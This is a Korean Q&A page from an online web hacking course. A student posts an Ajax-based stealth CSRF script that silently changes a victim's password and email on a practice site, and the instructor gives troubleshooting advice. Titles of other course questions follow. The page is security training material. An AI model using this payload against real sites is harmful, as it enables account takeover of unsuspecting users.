웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩

[실습6-3] Ajax를 활용한 Stealth CSRF 공격

코드상에 잘못된 점을 모르겠습니다 ㅠ

2021-09-24T16:07:45.612Z

185

yeonbeom sung

작성한 질문수 5

<script> var xhp = new XMLHttpRequest(); xhp.open("POST", "/index.php?page=mypage", true); xhp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhp.send("gubun=action&name=희생자&password=test&email=victim&company=(주)희생자"); </script>

인데 안되는 이유를 모르겠습니다. 입력할때는 개행 다 없앴습니다.

인젝션 모의해킹

답변 1

크리핵티브

2021-09-30T03:28:51.213Z

안녕하세요.

코드상 문제는 없는 것 같습니다.

저처럼 사이트 접속 시 /insecure_website/ 하위에 소스코드가 있으신건 아니죠?

희생자 웹 브라우저에서 해당 스크립트 실행 시 버프를 통해 잘 요청되는지, 응답은 제대로 오는지도 확인을 해보시면 문제점 파악이 가능하실겁니다.

세션하이제킹에서 태그

2023-02-19T13:26:51.491Z

481

pw='[ENC_DATA]'

2023-01-28T13:56:07.538Z

417

MAC php.ini 파일 내 magic_quotes_gpc

2023-01-28T10:33:30.981Z

639

cmd에 mysql에 접속하는데 apmsetup과 관련된 database가 안나오는데 어떻게 해야 연결이 되나요?

2023-01-06T06:47:12.381Z

552

맥 apmsetup 다운로드

2022-11-14T10:47:16.150Z

523

dom-based xss 공격실습 관련 오류

2022-10-21T06:37:47.683Z

493

iconv 오류

2022-10-03T04:45:50.229Z

450

실습페이지가 버프스위트에 잡히지가 않습니다

2022-09-25T10:28:53.736Z

378

URL접근제한 미흡 - 관리자 페이지 Burp spider

2022-09-11T05:08:44.827Z

300

게시글 수정 및 삭제

2022-09-01T08:38:48.618Z

360

오류 질문

2022-09-01T08:22:53.396Z

348

인증서 설치하고 다 설정 제대로 되있는데 무한정 대기걸립니다.

2022-08-26T09:24:52.040Z

394

E드라이브의 www폴더와 192.168.0.200 ip상관관계

2022-08-11T07:29:36.066Z

379

캐시 단계 동일한 쿼리 들어올 경우

2022-08-09T08:58:22.260Z

286

C:\APM_Setup\htdocs\insecure_website_20200729\index.php on line 19 오류

2022-06-10T17:58:12.463Z

259

에러 질문이요

2022-05-27T12:59:40.010Z

312

화면에 이거만 나오네요 왜이러죠???

2022-05-14T09:17:58.816Z

350

os command injection

2022-04-06T09:18:24.746Z

402

질문입니다.

2022-03-22T23:25:16.574Z

207

강의자료는 어디서 보나요?

2022-03-20T23:51:43.096Z

241

질문입니닷

2022-03-18T11:15:59.731Z

228

질문입니닷

2022-03-17T23:36:03.370Z

220

8분 48초 그림에서

2022-02-01T15:34:41.687Z

205

URL 접근구너한 제한 취약점 관련 문의

2022-02-01T13:04:09.050Z

351